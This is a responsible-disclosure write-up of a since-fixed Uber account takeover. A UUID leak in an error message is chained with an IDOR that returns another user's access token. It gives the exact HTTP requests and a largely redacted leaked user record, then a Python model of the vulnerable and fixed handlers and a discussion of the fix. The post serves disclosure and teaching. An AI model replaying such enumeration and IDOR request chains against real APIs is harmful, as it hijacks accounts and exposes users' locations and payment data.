How your Uber account could have been hacked!

This post is about an account takeover vulnerability on Uber which allowed attackers to take over any other user’s Uber account.

Written by Anand Prakash

September 11, 2019 | 3 min read

This is being published with Uber's permission under its responsible disclosure policy. The issue was fixed quickly by Uber's security team.

This issue is similar to Facebook's access token leak, disclosed in 2018: https://techcrunch.com/2018/09/28/facebook-says-50-million-accounts-affected-by-account-takeover-bug/

About Uber

Uber is a transportation network company (TNC) headquartered in San Francisco, California. Uber offers services including peer-to-peer ridesharing, taxi cab hailing, food delivery, and a bicycle-sharing system. The company has operations in 785 metropolitan areas worldwide. Uber has a valuation of over $100 billion, as per Bloomberg’s report.

Vulnerability Description

The vulnerability allowed an attacker to take over any other user's Uber account (rider, driver/partner or Eats) by supplying the victim's user UUID in an API request and using the access token leaked in the response to hijack the account. The victim's UUID itself could be enumerated through a separate API request that accepted a phone number or email address, so the attacker needed nothing more than a contact detail of the target.

The leaked token was the access token of the Uber mobile application, so with it an attacker could track the victim's location, take rides on their account, and so on. Driver (partner) and Eats accounts could be taken over the same way.

Steps to Reproduce

Step 1: Getting the user UUID of any Uber user

The endpoint below leaked any Uber user's (partner, rider or Uber Eats) UUID when supplied with their phone number or email address. Both calls hit the same RPC; they differ only in the lookup key sent in the body.

API Call #1

POST /p3/fleet-manager/_rpc?rpc=addDriverV2 HTTP/1.1
Host: partners.uber.com
{"nationalPhoneNumber":"99999xxxxx","countryCode":"1"}

Response:
{"status":"failure","data":{"code":1009,"message":"Driver '47d063f8-0xx5e-xxxxx-b01a-xxxx' not found"}}

'47d063f8-0xx5e-4eb4-xxx-xxxxxxx' is the leaked Uber UUID of the user with phone number 99999xxxxx. The endpoint resolves the phone number to an account before failing, and the failure message echoes that account's UUID, which is the leak: the request is rejected, but the error text still tells the caller which account the contact detail belongs to.

API Call #2

POST /p3/fleet-manager/_rpc?rpc=addDriverV2 HTTP/1.1
Host: partners.uber.com
{"email":"[email protected]"}

Response leaking the UUID:

{"status":"failure","data":{"code":1009,"message":"Driver 'ca111b95-1111-4396-b907-83abxxx5f7371e' not found"}}

'ca111b95-1111-4396-b907-83abxxx5f7371e' is the leaked Uber UUID of the user with email address [email protected].

Step 2: Getting the access token of any Uber user by supplying their UUID

With a victim's UUID from Step 1, replay the request below with that UUID in the userUuid field. The response returned the victim's private data, including the mobile-app access token, location and address. The access token gave complete control of the account: using it, I could see rides, request rides and view payment information for our test accounts.

The vulnerable Uber API:

POST /marketplace/_rpc?rpc=getConsentScreenDetails HTTP/1.1
Host: bonjour.uber.com
Connection: close
Content-Length: 67
Accept: application/json
Origin: https://bonjour.uber.com
x-csrf-token: xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: xxxxx
{"language":"en","userUuid":"xxxx-776-4xxxx1bd-861a-837xxx604ce"}

The response leaked the other user's entire record, including the mobile-app access token (the token field below), alongside the emailToken and mobileToken confirmation values, contact details and signup location:

{"status":"success","data":{"data":{"language":"en","userUuid":"xxxxxx1e"},"getUser":{"uuid":"cxxxxxc5f7371e","firstname":"Maxxxx","lastname":"XXXX","role":"PARTNER","languageId":1,"countryId":77,"mobile":null,"mobileToken":1234,"mobileCountryId":77,"mobileCountryCode":"+91","hasAmbiguousMobileCountry":false,"lastConfirmedMobileCountryId":77,"email":"[email protected]","emailToken":"xxxxxxxx","hasConfirmedMobile":"no","hasOptedInSmsMarketing":false,"hasConfirmedEmail":true,"gratuity":0.3,"nickname":"[email protected]","location":"00000","banned":false,"cardio":false,"token":"b8038ec4143bb4xxxxxx72d","fraudScore":0,"inviterUuid":null,"pictureUrl":"xxxxx.jpeg","recentFareSplitterUuids":["xxx"],"lastSelectedPaymentProfileUuid":"xxxxxx","lastSelectedPaymentProfileGoogleWalletUuid":null,"inviteCode":{"promotionCodeId":xxxxx,"promotionCodeUuid":"xxxx","promotionCode":"manishas105","createdAt":{"type":"Buffer","data":[0,0,1,76,2,21,215,101]},"updatedAt":{"type":"Buffer","data":[0,0,1,76,65,211,61,9]}},"driverInfo":{"contactinfo":"999999999xx","contactinfoCountryCode":"+91","driverLicense":"None","firstDriverTripUuid":null,"iphone":null,"partnerUserUuid":"xxxxxxx","receiveSms":true,"twilioNumber":null,"twilioNumberFormatted":null,"cityknowledgeScore":0,"createdAt":{"type":"Buffer","data":[0,0,1,84,21,124,80,52]},"updatedAt":{"type":"Buffer","data":[0,0,1,86,152,77,41,77]},"deletedAt":null,"driverStatus":"APPLIED","driverFlowType":"UBERX","statusLocks":null,"contactinfoCountryIso2Code":"KR","driverEngagement":null,"courierEngagement":null},"partnerInfo":{"address":"Nxxxxxxx","territoryUuid":"xxxxxx","company":"None","address2":"None","cityId":130,"cityName":"None","firstPartnerTripUuid":null,"preferredCollectionPaymentProfileUuid":null,"phone":"","phoneCountryCode":"+91","state":"None","vatNumber":"None","zipcode":"None","createdAt":{"type":"Buffer","data":[0,0,1,84,21,124,80,52]},"updatedAt":{"type":"Buffer","data":[0,0,1,101,38,177,88,137]},"deletedAt":null,"fleetTypes":[],"fleetServices":[],"isFleet":true},"analytics":{"signupLat":133.28741199,"signupLng":11177.1111,"signupTerritoryUuid":"xxxxx","signupPromoId":null,"signupForm":"iphone","signupSessionId":"xxxxxxx","signupAppVersion":"2.64.1","signupAttributionMethod":null,"createdAt":{"type":"Buffer","data":[0,0,1,76,2,21,219,1]},"updatedAt":{"type":"Buffer","data":[0,0,1,76,2,21,219,1]},"signupCityId":130,"signupDeviceId":null,"signupReferralId":null,"signupPromoCode":null,"signupPromoCodeUuid":null,"signupPromoUuid":null,"signupMethod":"REGULAR"},"createdAt":{"type":"Buffer","data":[0,0,1,76,2,21,215,153]},"updatedAt":{"type":"Buffer","data":[0,0,1,102,81,35,153,135]},"deletedAt":null,"tenancy":"uber/production","mobileConfirmationStatus":"MOBILE_NOT_CONFIRMED","nationalId":null,"nationalIdType":null,"merchantLocation":null,"lastConfirmedMobile":"xxxxxxxxxx","requestedDeletionAt":null,"dateOfBirth":xxxxxx,"userTypes":null,"preferredName":"xxxxxxxx","freightInfo":null,"tempPictureUrl":null,"identityVerified":null,"paymentEntityType":null,"riderEngagement":null,"identityRejectReasonUuid":null,"genderInferred":null,"genderIdentity":null,"genderDocumented":null,"riderIneligibleWdw":null,"defaultPaymentProfileByProduct":null,"loginEligibility":null},"getDisclosureVersionUuid":"","getLocaleCopy":null}}

Video Proof of Concept

Uber account takeover – access token leak

Uber fixed the issue by authorizing the request against the current user's session (so the userUuid in the body can no longer select another account) and by removing sensitive fields such as the access token from the response. Either change alone breaks the chain; together they also close the data exposure for a user's own record.
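To make the bug class concrete, here is an added example, not Uber's code or the author's tooling, that models the two endpoints from the steps above in their vulnerable and fixed forms and runs the same two-step chain against each. The handler names, the in-memory user directory, the UUIDs, emails and tokens are all constructed for the example; the fixed handlers implement the two changes described (subject taken from the session, response fields allow-listed, and an error message that no longer echoes the resolved UUID).

```python
import re
from dataclasses import dataclass

# Added example (hypothetical handlers, constructed data): model of the
# addDriverV2 UUID leak and the getConsentScreenDetails IDOR, before and after.

UUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")


@dataclass
class User:
    uuid: str
    email: str
    phone: str
    firstname: str
    token: str          # mobile-app access token: must never be serialised to a client
    is_driver: bool = False


# Constructed directory: hypothetical users, UUIDs and tokens, not real data.
USERS = {
    u.uuid: u
    for u in [
        User("4f8a2b3c-1d2e-4f60-8a1b-2c3d4e5f6a7b", "victim@example.com",
             "5550001111", "Victim", "tok-victim-secret", is_driver=False),
        User("9e8d7c6b-5a49-4382-b1c0-d9e8f7a6b5c4", "attacker@example.com",
             "5550002222", "Attacker", "tok-attacker", is_driver=True),
    ]
}
ATTACKER = "9e8d7c6b-5a49-4382-b1c0-d9e8f7a6b5c4"


def find_by_contact(body):
    """Resolve an email or national phone number to an account, as the lookup did."""
    for u in USERS.values():
        if body.get("email") == u.email or body.get("nationalPhoneNumber") == u.phone:
            return u
    return None


# ---- Step 1: addDriverV2 ----------------------------------------------------
def add_driver_vulnerable(session_uuid, body):
    """Resolves the contact to an account, then echoes that account's UUID in the error."""
    u = find_by_contact(body)
    if u is not None and not u.is_driver:
        return {"status": "failure",
                "data": {"code": 1009, "message": f"Driver '{u.uuid}' not found"}}
    if u is None:
        return {"status": "failure", "data": {"code": 1009, "message": "Driver not found"}}
    return {"status": "success", "data": {}}


def add_driver_fixed(session_uuid, body):
    """Same lookup, but the failure text never carries the resolved identifier."""
    u = find_by_contact(body)
    if u is None or not u.is_driver:
        return {"status": "failure", "data": {"code": 1009, "message": "Driver not found"}}
    return {"status": "success", "data": {}}


# ---- Step 2: getConsentScreenDetails ----------------------------------------
PUBLIC_FIELDS = ("uuid", "firstname", "email")


def consent_vulnerable(session_uuid, body):
    """Requires *a* session, then trusts the client-supplied userUuid and dumps the record."""
    if session_uuid not in USERS:
        return {"status": "failure", "data": {"code": 401}}
    target = USERS.get(body.get("userUuid"))
    if target is None:
        return {"status": "failure", "data": {"code": 404}}
    return {"status": "success", "data": {"getUser": vars(target).copy()}}


def consent_fixed(session_uuid, body):
    """Subject comes from the session, not the body; only allow-listed fields are returned."""
    target = USERS.get(session_uuid)
    if target is None:
        return {"status": "failure", "data": {"code": 401}}
    if body.get("userUuid") not in (None, target.uuid):
        return {"status": "failure", "data": {"code": 403}}
    return {"status": "success",
            "data": {"getUser": {k: getattr(target, k) for k in PUBLIC_FIELDS}}}


# ---- The chain from the post, run against either pair of handlers -----------
def takeover(add_driver, consent, attacker_uuid, victim_email):
    """Return the victim's access token if the chain works, else None."""
    r1 = add_driver(attacker_uuid, {"email": victim_email})
    m = UUID_RE.search(r1["data"].get("message", ""))
    if m is None:
        return None                                   # step 1 closed: nothing to pivot on
    r2 = consent(attacker_uuid, {"language": "en", "userUuid": m.group(0)})
    return r2.get("data", {}).get("getUser", {}).get("token")


if __name__ == "__main__":
    print("vulnerable:", takeover(add_driver_vulnerable, consent_vulnerable, ATTACKER, "victim@example.com"))
    print("fixed:     ", takeover(add_driver_fixed, consent_fixed, ATTACKER, "victim@example.com"))
```

Running it prints the victim's token for the vulnerable pair and None for the fixed pair; fixing either endpoint alone also breaks the chain, which is why both changes are worth making. Note that even the fixed addDriverV2 still answers differently for a contact that is a driver and one that is not, so it remains an enumeration oracle for driver status; closing that fully means identical responses for both cases plus rate limiting on the lookup.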

Disclosure Timeline

April 19, 2019 — Reported to Uber
April 25, 2019 — Report Triaged
April 26, 2019 — Vulnerability fixed; bounty of $6,500 USD awarded
June 28, 2019 — Requested disclosure
September 9, 2019 — Report disclosed by Uber